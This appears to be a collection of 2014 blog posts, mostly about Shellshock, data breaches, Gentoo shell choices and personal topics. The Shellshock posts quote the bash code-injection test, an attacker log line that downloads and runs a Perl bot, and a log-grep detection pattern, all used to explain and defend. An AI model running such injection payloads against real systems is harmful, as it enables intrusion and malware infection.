Planet 2014-09-30 10:01 UTC

Apple has released updates to insulate Mac OS X systems from the dangerous “Shellshock” bug, a pervasive vulnerability that is already being exploited in active attacks.

Patches are available via Software Update, or from the following links for OS X Mavericks, Mountain Lion, and Lion:

After installing the updates, Mac users can check to see whether the flaw has been truly fixed by taking the following steps:

* Open Terminal, which you can find in the Applications folder (under the Utilities subfolder on Mavericks) or via Spotlight search.

* Execute this command:
bash --version

* The version after applying this update will be:

OS X Mavericks:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin13)
OS X Mountain Lion:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin12)
OS X Lion:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin11)
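Beyond comparing version strings, you can test for the flaw directly. This is the widely circulated check for CVE-2014-6271, the original Shellshock bug; a patched bash prints only the trailing echo, while a vulnerable one prints “vulnerable” first:

```shell
# On a vulnerable bash, the function definition smuggled in through the
# environment variable is executed, printing "vulnerable" before the echo.
# A patched bash prints only "this is a test".
env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'
```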

Today was an interesting one that I probably won’t forget for a while. Sure, I will likely forget all the details, but the point of the day will remain in my head for a long time to come. Why? Simply put, it made me think about the power of positivity (which is not generally a topic that consumes much of my thought cycles).

I started out the day in the same way that I start out almost every other day—with a run. I had decided that I was going to go for a 15 km run instead of the typical 10 or 12, but that’s really irrelevant. Within the first few minutes, I passed an older woman (probably in her mid-to-late sixties), and I said “good morning.” She responded with “what a beautiful smile! You make sure to give that gift to everyone today.” I was really taken aback by her comment because it was rather uncommon in this day and age.

Her comment stuck with me for the rest of the run, and I thought about the power that it had. It cost her absolutely nothing to say those refreshing, kind words, and yet, the impact was huge! Not only did it make me feel good, but it had other positive qualities as well. It made me more consciously consider my interactions with so-called “strangers.” I can’t control any aspect of their lives, and I wouldn’t want to do so. However, a simple wave to them, or a “good morning” may make them feel a little more interconnected with humanity.

Not all that long after, I went to get a cup of coffee from a corner shop. The clerk asked if that would be all, and I said it was. He said “Have a good day.” I didn’t have to pay for it because apparently it was National Coffee Day. Interesting. The more interesting part, though, was when I was leaving the store. I held the door for a man, and he said “You, sir, are a gentleman and a scholar,” to which I responded “well, at least one of those.” He said “aren’t you going to tell me which one?” I said “nope, that takes the fun out of it.”

That brief interaction wasn’t anything special at all… or was it? Again, it embodied the interconnectedness of humanity. We didn’t know each other at all, but yet we were able to carry on a short conversation, understand one another’s humour, and, in our own ways, thank each other. He thanked me for a small gesture of politeness, and I thanked him for acknowledging it. All too often those types of gestures go without as much as a “thank you.” All too often, these types of gestures get neglected and never even happen.

What’s my point here? Positivity is infectious, and in a great way! Whenever you’re thinking that the things you do and say don’t matter, think again. Just treating the people with whom you come in contact many, many times each day with a little respect can positively change the course of their day. A smile, saying hello, casually asking how they’re doing, holding a door, helping someone pick up something they’ve dropped, or any other positive interaction should be pursued (even if it is a little inconvenient for you). Don’t underestimate the power of positivity; you may just help someone feel better. What’s more important than that? That’s not a rhetorical question; the answer is “nothing.”


“Please note that [COMPANY NAME] takes the security of your personal data very seriously.” If you’ve been on the Internet for any length of time, chances are very good that you’ve received at least one breach notification email or letter that includes some version of this obligatory line. But as far as lines go, this one is about as convincing as the classic break-up line, “It’s not you, it’s me.”

I was reminded of the sheer emptiness of this corporate breach-speak approximately two weeks ago, after receiving a snail mail letter from my Internet service provider — Cox Communications. In its letter, the company explained:

“On or about Aug. 13, 2014, we learned that one of our customer service representatives had her account credentials compromised by an unknown individual. This incident allowed the unauthorized person to view personal information associated with a small number of Cox accounts. The information which could have been viewed included your name, address, email address, your Secret Question/Answer, PIN and in some cases, the last four digits only of your Social Security number or driver’s license number.”

The letter ended with the textbook offer of free credit monitoring services (through Experian, no less), and the obligatory “Please note that Cox takes the security of your personal data very seriously.” But I wondered how seriously they really take it. So, I called the number on the back of the letter, and was directed to Stephen Boggs, director of public affairs at Cox.

Boggs said that the trouble started after a female customer account representative was “socially engineered” or tricked into giving away her account credentials to a caller posing as a Cox tech support staffer. Boggs informed me that I was one of just 52 customers whose information the attacker(s) looked up after hijacking the customer service rep’s account.

The nature of the attack described by Boggs suggested two things: 1) That the login page that Cox employees use to access customer information is available on the larger Internet (i.e., it is not an internal-only application); and that 2) the customer support representative was able to access that public portal with nothing more than a username and a password.

Boggs either did not want to answer or did not know the answer to my main question: Were Cox customer support employees required to use multi-factor or two-factor authentication to access their accounts? Boggs promised to call back with a definitive response. To Cox’s credit, he did call back a few hours later, and confirmed my suspicions.

“We do use multifactor authentication in various cases,” Boggs said. “However, in this situation there was not two-factor authentication. We are taking steps based on our investigation to close this gap, as well as to conduct re-training of our customer service representatives to close that loop as well.”

This sad state of affairs is likely the same across multiple companies that claim to be protecting your personal and financial data. In my opinion, any company — particularly one in the ISP business — that isn’t using more than a username and a password to protect their customers’ personal information should be publicly shamed.

Unfortunately, most companies will not proactively take steps to safeguard this information until they are forced to do so — usually in response to a data breach.  Barring any pressure from Congress to find proactive ways to avoid breaches like this one, companies will continue to guarantee the security and privacy of their customers’ records, one breach at a time.

Return of the IPJ | 2014-09-29 19:17 UTC

The Internet Protocol Journal was one of the best publications in the networking sector, so I was quite disappointed when it was discontinued last year. All the more pleasing that the IPJ has been relaunched with new sponsors. My copy arrived in my mailbox over the weekend.
The new website does not yet say how the print edition can be subscribed to. The online version, however, can be downloaded as before.
The main topics of the current issue are:

  • Gigabit Wi-Fi
  • A Question of DNS Protocols

PostgreSQL Ebuilds Unified titanofold | 2014-09-29 18:21 UTC

I’ve finished making the move to unified PostgreSQL ebuilds in my overlay. Please give it a go and report any problems there.

Also, I know the comments are disabled. I have 27,186 comments to moderate. All of them are spam. I don’t want to deal with it.

(See my previous post on the topic for why.)

Bye bye Feedburner some useful things | 2014-09-29 14:26 UTC

Since using Feedburner no longer brings me any added value, I have switched the feeds back to the original WordPress feeds. The RSS feed address is now:

Please update your feed readers!

If you have any interest in IT security you have probably heard of a vulnerability in the command line shell Bash, now called Shellshock. Whenever serious vulnerabilities are found in such a widely used piece of software, it's inevitable that this will have some impact. Machines get owned and abused to send spam, DDoS other people or spread malware. However, I feel a lot of the scale of the impact is due to the fact that far too many people run infrastructure on the Internet in an irresponsible way.

After Shellshock hit the news it didn't take long for the first malicious attacks to appear in people's webserver logs, besides some scans that were done by researchers. On Saturday I had a look at a few such log entries, from my own servers and from what other people posted on some forums. This was one of them: - - [26/Sep/2014:17:19:07 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 12241 "-" "() { :;}; /bin/bash -c \"cd /var/tmp;wget;curl -O /var/tmp/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

Note the time: this was on Friday afternoon, 5 pm (CET). What's happening here is that someone is running an HTTP request where the User-Agent string, which usually contains the name of the software (e. g. the browser), is set to some malicious code meant to exploit the Bash vulnerability. If successful, it would download a malware script called jurat and execute it. We had obviously already upgraded our Bash installation, so this didn't do anything on our servers. The file jurat contains a Perl script, a piece of malware known as IRCbot.a or Shellbot.B.
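If you want to check your own logs for attempts like this one, a simple match on the characteristic "() {" function-definition prefix usually suffices. A rough sketch (the log path is an assumption; adjust it for your web server and distribution):

```shell
# List requests whose headers carried the Shellshock marker "() {".
# -F treats the pattern as a fixed string, -h suppresses file names.
grep -Fh '() {' /var/log/apache2/access_log
```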

For all such logs I checked whether the downloads were still available. Most of them were offline; however, the one presented here was still there. I checked the IP: it belongs to a Dutch company called AltusHost. Most likely one of their servers got hacked and someone placed the malware there.

I tried to contact AltusHost in different ways. I tweeted at them. I tried their live support chat. I could chat with somebody who asked me if I was a customer. He told me that if I wanted to report abuse he couldn't help me; I should write an email to their abuse department. I asked him if he couldn't just tell them himself. He said that was not possible. I wrote an email to their abuse department. Nothing happened.

At Sunday noon the malware was still online. When I checked again late on Sunday evening, it was gone.

Don't get me wrong: things like this happen. I run servers myself. You cannot protect your infrastructure from every imaginable threat. You can greatly reduce the risk, and we do a lot to achieve that, but there are things you can't prevent. Your customers will do things that are out of your control, and sometimes security issues arise faster than you can patch them. However, what you can, and absolutely must, do is have reasonable crisis management.

When one of the servers in your responsibility is part of a large-scale attack based on a threat that's a headline in all the news, I can't even imagine what it takes not to notice for almost two days. I don't believe I was the only one trying to get their attention. The speed at which you take action in such a situation is the difference between hundreds and millions of infected hosts. Having your hosts deploy malware for that long is the kind of thing that makes the Internet a less secure place for everyone. Companies like AltusHost are helping malware authors. Not directly, but through their inaction.

Photo credit: Liam Quinn
This is going to be interesting as Planet Gentoo is currently unavailable as I write this. I'll try to send this out further so that people know about it.

By now we have all been doing our best to update our laptops and servers to the new bash version, so that we are safe from the big scare of the quarter, Shellshock. I say laptop because the way the vulnerability can be exploited limits the impact considerably if you have a desktop or otherwise connect only to trusted networks.

What remains to be done is to figure out how to avoid a repeat of this. And that's a difficult topic, because a 25-year-old bug is not easy to avoid, especially since there are probably plenty of its siblings around that we have not found yet, just like this one last week. But there are things that we, as a whole environment, can do to reduce the chances of problems like this happening, or at least stop them escalating so quickly.

In this post I want to look into some things that Gentoo and its developers can do to make things better.

The first obvious thing is to figure out why /bin/sh for Gentoo is not dash or any other very limited shell such as BusyBox. The main answer lies in the init scripts that still use bashisms; this is not news, as I pushed for fixing that four years ago, while Roy insisted on it even before that. Interestingly enough, though, this excuse is getting less and less relevant thanks to systemd. This is indeed, among all its traits, one I find genuinely good in Lennart's design: we want declarative init systems, not imperative ones. Unfortunately, even systemd is not as declarative as it was originally supposed to be, so the init script problem is only half solved — on the other hand, it does make things much easier, as you have to start afresh anyway.

If either all your init scripts are non-bash-requiring or you're using systemd (like me on the laptops), then it's mostly safe to switch to dash as the provider for /bin/sh:

# emerge eselect-sh
# eselect sh set dash
That will change your /bin/sh and make it much less likely that you'd be vulnerable to this particular problem. Unfortunately, as I said, it's only mostly safe. I found that some of the init scripts I wrote, even though I had checked them with checkbashisms, did not work as intended with dash; fixes are on their way. I also found that the lsb_release command, while not requiring bash itself, uses non-POSIX features, resulting in garbage in its output. This breaks facter-2 but not facter-1, as I found out when it broke my Puppet setup.
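checkbashisms catches many of these, but as both my init scripts and lsb_release show, not all of them. A crude additional check is to grep for a few common offenders yourself; the patterns below are an illustrative sketch, nowhere near exhaustive, and the target path is just an example:

```shell
# Flag some frequent bashisms that dash rejects: [[ ]] tests, the
# "function" keyword, and ${var/pattern/replacement} substitutions.
grep -nE '\[\[|^[[:space:]]*function[[:space:]]|\$\{[A-Za-z_]+/' /etc/init.d/*
```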

Interestingly it would be simpler for me to use zsh, as then both the init script and lsb_release would have worked. Unfortunately when I tried doing that, Emacs tramp-mode froze when trying to open files, both with sshx and sudo modes. The same was true for using BusyBox, so I decided to just install dash everywhere and use that.

Unfortunately it does not mean you'll be perfectly safe or that you can remove bash from your system. Especially in Gentoo, we have too many dependencies on it, the first being Portage of course, but eselect also qualifies. Of the two I'm actually more concerned about eselect: I have been saying this from the start, but designing such a major piece of software – that does not change that often – in bash sounds like insanity. I still think that is the case.

I think this is the main problem: in Gentoo especially, bash has always been considered a programming language. That's bad. Not only because it has just one reference implementation, but because it also seems to convince other people, new to coding, that it's good engineering practice. It is not. If you need to build something like eselect, you do it in Python, or Perl, or C, but not bash!

Gentoo is currently stagnating, and that's hard to deny. I've stopped being active since I finally accepted stable employment – I'm almost thirty, it was time to stop playing around, I needed to make a living, even if I don't really make a life – and QA has obviously taken a step back (I still have a non-working dev-python/imaging on my laptop). So trying to push for getting rid of bash in Gentoo altogether is not a good deal. On the other hand, even though it's going to be probably too late to be relevant, I'll push for having a Summer of Code next year to convert eselect to Python or something along those lines.

Myself, I decided that the current bashisms in the init scripts I rely upon on my servers are simple enough that dash will work, so I pushed that through Puppet to all my servers. It should be enough, for the moment. I expect more scrutiny to be spent on dash, zsh, ksh and the other shells in the next few months as people migrate around, or decide that a 25-year-old bug is enough to think twice about all of them, so I'll keep my options open.

This is actually why I like software biodiversity: it gives you the option of selecting a different component when one fails, and that is what worries me the most about systemd right now. I also hope that showing how bad bash has been all this time, with its closed development, will make it possible to have a better syntax-compatible shell with a proper parser, even better with a properly librarised implementation. But that's probably hoping too much.

The third BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

A Legal Dispute with a Ghost My Universe | 2014-09-28 06:59 UTC

Updating to the latest Ghost version, 0.5.2, comes with a few pitfalls; my own installation guide does not cover some of the newly added difficulties, most of which stem from the fact that, in my case, the ghost has to do its duty under FreeBSD.

The first hurdle was an endless list of error messages thrown by a harmless npm install --production. Although my Ghost is configured to run with PostgreSQL, it now forces a build of the SQLite modules, whose dependencies were of course not installed; a problem that seemed easy to fix:

pkg update && pkg upgrade  
pkg ins sqlite3 py27-sqlite3  
That changed the shape of the error message, but did not banish it. Digging deeper into the error logs and various JSON and JavaScript files, I found that the path to the Python interpreter must have been hard-wired somewhere, so that the PYTHON environment variable never came into play and was simply ignored in this case.

The solution to the problem is quite simple; a symlink does the trick (even if it is not very elegant):

cd /usr/local/bin  
ln -s python2 python  
After that, all the dependencies built cleanly, and Ghost could be started manually (via npm start or node index.js) without further ado. But this is where the really fun part began, because Supervisor could not persuade Ghost to stop terminating itself immediately again, which led to log entries as bizarre as these:

2014-09-27 15:06:42,973 INFO spawned: 'ghost' with pid 40876  
2014-09-27 15:06:43,027 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:44,092 INFO spawned: 'ghost' with pid 40877  
2014-09-27 15:06:44,146 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:46,240 INFO spawned: 'ghost' with pid 40879  
2014-09-27 15:06:46,295 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:49,600 INFO spawned: 'ghost' with pid 40883  
2014-09-27 15:06:49,655 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:50,678 INFO gave up: ghost entered FATAL state, too many start retries too quickly  
So the Ghost process promptly exited again with status 0. Yes, you read that correctly: Ghost falls flat on its face, but reports that it shut down normally. And since Ghost started and ran flawlessly from the command line, I naturally went looking for the fault in supervisord; in vain, as I was to find out afterwards.
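For context, a minimal supervisord program section for Ghost might look like the following sketch; the paths, user, and environment here are assumptions, not my actual configuration. It is the autorestart logic that produces the respawn attempts visible in the log above:

```ini
[program:ghost]
command=node index.js
directory=/usr/local/www/ghost
user=ghost
environment=NODE_ENV="production"
autostart=true
autorestart=true
```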

It was the recalcitrant ghost that was (once again) disobeying its process supervisor. In the absence of a clear cause for this behaviour, the only things that helped were analysing the log files (to a limited degree) and the source code. The stumbling block turned out to be the permissions in the content directory of the Ghost installation.

While the data and images subdirectories have always required write access for the ghost, apps and themes were a different story; the latter in particular was read-only in my setup, because I wanted to give the still rather immature Ghost as little opportunity as possible to cause persistent damage in the event of an exploitable security hole (such as smuggling malicious JavaScript into the theme).

The strange behaviour can thus be stopped temporarily by granting Ghost the permissions it wants, but as with a defiant child, giving in is perhaps not the best idea here. I have therefore opened a discussion topic in the Ghost forum, in the hope that one of the next releases will quietly accept not being allowed to scribble all over the disk.

I’ve been blogging about my non-Gentoo work using my drupal site at  but since I may be losing that server sometime in the future, I’m going to start duplicating those posts here.  This work should be of interest to readers of Planet Gentoo because it draws a lot from Gentoo, but it doesn’t exactly fall under the category of a “Gentoo Project.”

Anyhow, today I’m releasing tor-ramdisk 20140925.  As you may recall from a previous post, tor-ramdisk is a uClibc-based micro Linux distribution I maintain whose only purpose is to host a Tor server in an environment that maximizes security and privacy.  Security is enhanced using Gentoo’s hardened toolchain and kernel, while privacy is enhanced by forcing logging to be off at all levels.  Also, tor-ramdisk runs in RAM, so no information survives a reboot, except for the configuration file and the private RSA key, which may be exported/imported by FTP or SCP.

A few days ago, the Tor team released with one major bug fix according to their ChangeLog. Clients were apparently sending the wrong address for their chosen rendezvous points for hidden services, which sounds like it shouldn’t work, but it did because they also sent the identity digest. This fix should improve surfing of hidden services. The other minor changes involved updating geoip information and the address of a v3 directory authority, gabelmoo.

I took this opportunity to also update busybox to version 1.22.1, openssl to 1.0.1i, and the kernel to 3.16.3 + Gentoo’s hardened-patches-3.16.3-1.extras. Both the x86 and x86_64 images were tested using node “simba” and showed no issues.

You can get tor-ramdisk from the following URLs (at least for now!)



Photo credit: Images_of_Money
Almost exactly 18 months after moving to Ireland, I'm finally about to receive my first Irish credit card. This took longer than I was expecting, but at least it should cover a few of the needs I have, although it's not exactly my perfect plan either. But I guess it's better to start from the top.

First of all, I already have credit cards, Italian ones that, as I wrote before, are not chip'n'pin, which causes a major headache in countries such as Ireland (but the UK too), where cards without chip'n'pin are not really well supported or understood. This means they are not viable, even though I have been using them for years and have enough credit history with them that they have a higher limit than the norm, which is especially handy when dealing with things like expensive hotels when I'm on vacation.

But the question becomes why do I need a credit card? The answer lies in the mess that the Irish banking system is: since there is no "good" bank over here, I've been using the same bank I was signed up with when I arrived, AIB. Unfortunately their default account, which is advertised as "free", is only really free if for the whole quarter your bank account never goes below €2.5k. This is not the "usual" style I've seen from American banks where they expect that your average does not go below a certain amount, it does not matter if one day you have no money and the next you have €10k on it: if for one day in the quarter you dip below the threshold, you have to pay for the account, and dearly. At that point every single operation becomes a €.20 charge. Including PayPal's debit/credit verification, AdSense EFT account verification, Amazon KDP monthly credits. And including every single use of your debit card — for a while, NFC payments were excluded, so I tried to use it more, but very few merchants allowed that, and the €15 limit on its use made it quite impractical to pay most things. In the past year and a half, I paid an average of €50/quarter for a so-called free account.

Operations on most credit cards are, on the other hand, free; there are sometimes charges for "overseas usage" (foreign transactions), and you are charged interest if you don't pay the full amount of the debt at the end of the month, but you don't pay a fixed charge per operation. What you do pay here in Ireland is stamp duty, which is €30/year. A whole lot more than Italy, where it was €1.81 until they dropped it entirely. So my requirement for a credit card is essentially to hide as much of these costs as possible. Which essentially means that just getting a standard AIB card is not going to be very useful: yes, I would be saving money after the first 150 operations, but I would save more by keeping those €2.5k in the bank.

My planned end game was twofold: a Tesco credit card and an American Express Platinum, for very different reasons. I was finally able to get the former, but the latter is definitely out of my reach, as I'll explain later.

The Tesco credit card is a very simple option: you get 0.5% "pointback", as you get 1 Clubcard point for every €2 spent. Since each point gets you a €.01 discount at the end of the quarter, it's almost like a cashback, as long as you buy your groceries from Tesco (which I do, because it's handy to have the delivery rather than having to go out, especially for things that are frozen or that weigh a bit). Given that it starts with (I'm told) a puny limit of €750, maxing it out every month is enough to earn back the stamp duty with the cashback alone, and it becomes even easier by using it for all the small operations such as dinner, Tesco orders, online charges, the mobile phone, …
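The arithmetic in the paragraph above can be sanity-checked quickly (the €750 monthly limit is, as noted, hearsay):

```shell
# 1 Clubcard point per EUR 2 spent, EUR 0.01 back per point
monthly_limit=750
points=$(( monthly_limit * 12 / 2 ))     # 4500 points per year
cashback=$(( points / 100 ))             # EUR 45 back per year
echo "EUR ${cashback} cashback vs EUR 30 stamp duty"
```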

Getting the Tesco credit card has not been straightforward either. I tried applying a few months after arriving in Ireland, and I was rejected, as I did not have any credit history at all. I tried again earlier this year, this time after a raise at work, and the result was positive. Unfortunately that's only step one: the following steps require you to provide them with three pieces of documentation: something that shows you're in control of the bank account, a proof of address, and a proof of identity.

The first is kind of obvious: a recent enough bank statement is good, and so is the second, a phone or utility bill. The problem starts when you notice that they ask for an original and not a copy "from the Internet". This does not work easily given that I explicitly made sure all my services are paperless, so neither the bank nor the phone company sends me paper any more. The bank was the hardest to convince: for over a year they kept sending me a paper letter for every single wire I received, with the exception of my pay; that included money coming from colleagues when I acted as a payment hub, PayPal transfers for verification purposes, and Amazon KDP revenue, one per country! Luckily, they accepted a colour-printed copy of both.

Getting a proper ID certified was, though, much more complex. The only document I could use was my passport, as I don't have a driving licence or any other Irish ID. I made a proper copy of it, in colour, and brought it to my doctor for certification; he stamped and dated and declared, but it was not okay. I brought it to An Post – the Irish postal service – and told them that Tesco wanted a specific declaration on it, and showed them the letter they sent me; they refused and just stamped it. I then went to the Garda – the Irish police – and repeated Tesco's request; not only did they refuse to comply, but they told me that they are not allowed to do what Tesco was asking, and instead they authenticated a declaration of mine that the passport copy was original and made by me.

What worked, at the end, was to go to a bank branch – didn't have to be the branch I'm enrolled with – and have them stamp the passport for me. Tesco didn't care it was a different branch and they didn't know me, it was still my bank and they accepted it. Of course since it took a few months for me to go through all these tries, by the time they accepted my passport, I needed to send them another proof of address, but that was easy. After that I finally got the full contract to sign and I'm now only awaiting the actual plastic card.

But as I said my aim was also for an American Express Platinum card. This is a more interesting case study: the card is far from free, as it starts with a yearly fee of €550, which is what makes it a bit of a status symbol. On the other hand, it comes with two features: their rewards program, and the perks of Platinum. The perks are not all useful to me, having Hertz Gold is not useful if you don't drive, and I already have comprehensive travel insurance. I also have (almost) platinum status with IHG so I don't need a card to get the usual free upgrades if available. The good part about them, though, is that you can bless a second Platinum card that gets the same advantages, to "friends or family" — in my case, the target would have been my brother in law, as he and my sister love to travel and do rent cars.

It also gives you the option of sending out four more cards to friends and family, and in particular I wanted to have one sent to my mother, so that she has a way to pay for things and debit them to me so I can help her out. Of course, as I said, it has a cost, and a hefty one. On the other hand, it allows you one more trick: you can pay for the membership fee through the same rewards program they sign you up for. I don't remember how much you have to spend in a year to cover it, but I'm sure I could have managed to get most of the fee waived.

Unfortunately what happens is that American Express requires, in Ireland, a "bank guarantee", which according to colleagues means your bank takes on the onus of paying the first €15k of debt I might incur and be unable to repay. Something like this is not going to fly in Ireland, not only because of the problem with loans after the crisis, but also because none of the banks will give you that guarantee today. Essentially American Express is making it impossible for any Irish resident to get a card from them, and this, again according to colleagues, extends to cardholders in other countries moving into Ireland.

The end result is that I'm now stuck with having only one (Visa) credit card in Ireland, which has a feeble, laughable rewards program, but at least I have it, and it should be able to pay for itself. I'm still looking for a MasterCard I can get to hedge my bets on card acceptance – it turns out that Visa is not well received in the Netherlands or in Germany – and that can pay back its own stamp duty.

Signature Systems Inc., the point-of-sale vendor blamed for a credit and debit card breach involving some 216 Jimmy John’s sandwich shop locations, now says the breach also may have jeopardized customer card numbers at nearly 100 other independent restaurants across the country that use its products.

Earlier this week, Champaign, Ill.-based Jimmy John’s confirmed suspicions first raised by this author on July 31, 2014: That hackers had installed card-stealing malware on cash registers at some of its store locations. Jimmy John’s said the intrusion — which lasted from June 16, 2014 to Sept. 5, 2014 — occurred when hackers compromised the username and password needed to remotely administer point-of-sale systems at 216 stores.

Those point-of-sale systems were produced by Newtown, Pa., based payment vendor Signature Systems. In a statement issued in the last 24 hours, Signature Systems released more information about the break-in, as well as a list of nearly 100 other stores — mostly small mom-and-pop eateries and pizza shops — that were compromised in the same attack.

“We have determined that an unauthorized person gained access to a user name and password that Signature Systems used to remotely access POS systems,” the company wrote. “The unauthorized person used that access to install malware designed to capture payment card data from cards that were swiped through terminals in certain restaurants. The malware was capable of capturing the cardholder’s name, card number, expiration date, and verification code from the magnetic stripe of the card.”

Meanwhile, there are questions about whether Signature’s core product — PDQ POS — met even the most basic security requirements set forth by the PCI Security Standards Council for point-of-sale payment systems. According to the council’s records, PDQ POS was not approved for new installations after Oct. 28, 2013. As a result, any Jimmy John’s stores and other affected restaurants that installed PDQ’s product after the Oct. 28, 2013 sunset date could be facing fines and other penalties.

This snapshot from the PCI Council shows that PDQ POS was not approved for new installations after Oct. 28, 2013.
What’s more, the company that performed the security audit on PDQ — a now-defunct firm called Chief Security Officers — appears to be the only qualified security assessment firm to have had their certification authority revoked (PDF) by the PCI Security Standards Council.

In response to inquiry from KrebsOnSecurity, Jimmy John’s noted that of the 216 impacted stores, 13 were opened after October 28, 2013.

“We understood, from our point of sale technology vendor, that payment systems installed in those stores, as with all locations, were PCI compliant,” Jimmy John’s said in a statement. “We are working independently, and moving as quickly as possible, to install PCI compliant stand-alone payment terminals in those 13 stores. This is being overseen by Jimmy John’s director of information technology, who will confirm completion of this work directly with each location. As part of our broader response to the security incident, action has already been taken in those 13 stores, as well as the other impacted locations, to remove malware, and to install and assure the use of dual-factor authentication for remote access and encrypted swipe technology for store purchases. In addition, the systems used in all of our stores are scanned every day for malware.”

For its part, Signature Systems says it has been developing a new payment application that features card readers that utilize point-to-point encryption capable of blocking point-of-sale malware.

Tech media has been in a frenzy this year, trying to hype everything out there as the end of the Internet of Things or the nail in the coffin of open source. A bunch of opinion pieces I found also tried to imply that open source software is to blame, forgetting that the only reason the security issues found were considered so nasty is that we know the affected software is widely used.

First there was Heartbleed, whose discoverers decided to spend time setting up a cool name, logo and website for it, rather than ensuring it would be patched before it became widely known. Months later, LastPass still tells me that some of the websites I have passwords on have not changed their certificates. This at least spawned some interest around OpenSSL, including the OpenBSD fork, which I'm still not sure is going to stick around or not.

Just a few weeks ago a dump of passwords caused a major stir, as some online news sources kept insisting that Google had been hacked. Similarly, people have been insisting for the longest time that it was only Apple's fault that the photos of a bunch of celebrities were stolen and published on a bunch of sites — and they will probably never be expunged from the Internet's collective conscience.

And then there is the whole hysteria about Shellshock, which I already dug into. What I promised in that post is a look at the problem from the angle of project health.

With the term project health I'm referring to a whole set of issues around an open source software project. It's something that becomes second nature to a distribution packager/developer, but it is not obvious to many, especially because it is not easy to quantify. It's not a function of the number of commits or committers, or of the number of mailing lists and the traffic in them. It's an aura.

That OpenSSL's project health was terrible was no mystery to anybody. The code base in particular was terribly complicated and catered for corner cases that stopped being relevant years ago, and the LibreSSL developers have found plenty of reasons to be worried. But the fact that the codebase was in such a state, and that the developers didn't care to follow what the distributors do, or review patches properly, was not a surprise. You just need to be reminded of the Debian SSL debacle, which dates back to 2008.

In the case of bash, the situation is a bit more complex. The shell is a base component of all GNU systems, and it is the FSF's choice of UNIX shell. The fact that the man page states clearly It's too big and too slow. should tip people off, but it doesn't. And it's not just a matter of extending the POSIX shell syntax with enough sugar that people take it for a programming language and start using it as one — though that is also a big problem, and one that caused this particular issue.

The health of bash was not considered good by anybody involved with it at the distribution level. It certainly was not considered good by me: I moved to zsh years and years ago, and I have been working for over five years on getting rid of bashisms in scripts. Indeed, I have been pushing, with Roy and others, for the init scripts in Gentoo to be made completely POSIX shell compatible so that they can run with dash or with busybox — even before I was paid to do so for one of the devices I worked on.

Nowadays, the point is probably moot for many people. This is the most obvious piece of positive PR for systemd I can think of: no thinking about shells any more, for the most part. Of course it's not strictly true, but it does solve most of the problems with bashisms in init scripts. And it should solve the problem of using bash as a programming language, except it doesn't always — but that's a topic for a different post.

But why were distributors, and Gentoo devs, so wary about bash, way before this happened? The answer is complicated. While bash is a GNU project, and the GNU project is the poster child for Free Software, its management has always been sketchy. There is a single developer – The Maintainer, as the GNU website calls him, Chet Ramey – and the sole point of contact with him is the mailing lists. The code is released in dumps: a release tarball for the minor version, and then, every time a new micro version is to be released, a new patch is posted and distributed. If you're a Gentoo user, you can see this when emerging bash: all the patches are applied one on top of the other.

There is no public SCM — yes, there is a Git "repository", but it's essentially just an import of a given release tarball, with each released patch applied on top of it as a commit. Since these patches represent a whole point release, and they may be fixing different bugs, related or not, it's definitely not as useful as having a repository where the intent of each change shows clearly, so that you can figure out what is being done. Reviewing a proper commit-per-change repository is orders of magnitude easier than reviewing a diff between code dumps.

This is not completely unknown in the GNU sphere: glibc has had a terrible track record as well, and only recently, thanks to lots of combined effort, is sanity being restored. This also includes fixing a bunch of security vulnerabilities found, or driven into the ground, by my friend Tavis.

But this behaviour is essentially why people like me and other distribution developers have been unhappy with bash for years and years — not this particular vulnerability, but the health of the project itself. I have been using zsh for years, even though I had not installed it on all my servers until now (it's done now), and I have been pushing for a while for Gentoo to move to /bin/sh being provided by dash. Debian already did it, and the result is that the vulnerability is way less scary for them.

So yeah, I don't think it's happenstance that these issues are being found in projects that are not healthy. And it's not because they are open source, but rather because they are "open source" in a way that does not help. Yes, bash is open source, but unlike many other projects it is developed not in the open but behind closed doors, with a single leader.

So remember this: be open in your open source project, it makes for better health. And try to get more people than you involved, and review publicly the patches that you're sent!

As if consumers weren’t already suffering from breach fatigue: Experts warn that attackers are exploiting a critical, newly-disclosed security vulnerability present in countless networks and Web sites that rely on Unix and Linux operating systems. Experts say the flaw, dubbed “Shellshock,” is so intertwined with the modern Internet that it could prove challenging to fix, and in the short run is likely to put millions of networks and countless consumer records at risk of compromise.

The bug is being compared to the recent Heartbleed vulnerability because of its ubiquity and sheer potential for causing havoc on Internet-connected systems — particularly Web sites. Worse yet, experts say the official patch for the security hole is incomplete and could still let attackers seize control over vulnerable systems.

The problem resides with a weakness in the GNU Bourne Again Shell (Bash), the text-based, command-line utility on multiple Linux and Unix operating systems. Researchers discovered that if Bash is set up to be the default command line utility on these systems, it opens those systems up to specially crafted remote attacks via a range of network tools that rely on it to execute scripts, from telnet and secure shell (SSH) sessions to Web requests.
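The weakness sits in a normally benign bash feature: a shell function can be exported to child processes through the environment, and a child bash recreates it by parsing the environment value. A minimal, harmless sketch of that mechanism (the function name `greet` is made up for the demo; run it under bash):

```shell
# Define a function and ask bash to serialize it into the environment.
greet() { echo "hello from an exported function"; }
export -f greet

# A child bash finds the definition in its environment and recreates
# the function.  Shellshock was a parser bug in exactly this import
# step: code trailing the function body got executed on import.
bash -c 'greet'
```

An attacker who controls any environment variable of a process that later spawns bash (a CGI request header, for instance) can therefore smuggle a "function definition" in, which is why the bug is remotely reachable at all.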

According to several security firms, attackers are already probing systems for the weakness, and at least two computer worms are actively exploiting the flaw to install malware. Jaime Blasco, labs director at AlienVault, has been running a honeypot on the vulnerability since yesterday to emulate a vulnerable system.

“With the honeypot, we found several machines trying to exploit the Bash vulnerability,” Blasco said. “The majority of them are only probing to check if systems are vulnerable. On the other hand, we found two worms that are actively exploiting the vulnerability and installing a piece of malware on the system. This malware turns the systems into bots that connect to a C&C server where the attackers can send commands, and we have seen the main purpose of the bots is to perform distributed denial of service attacks.”

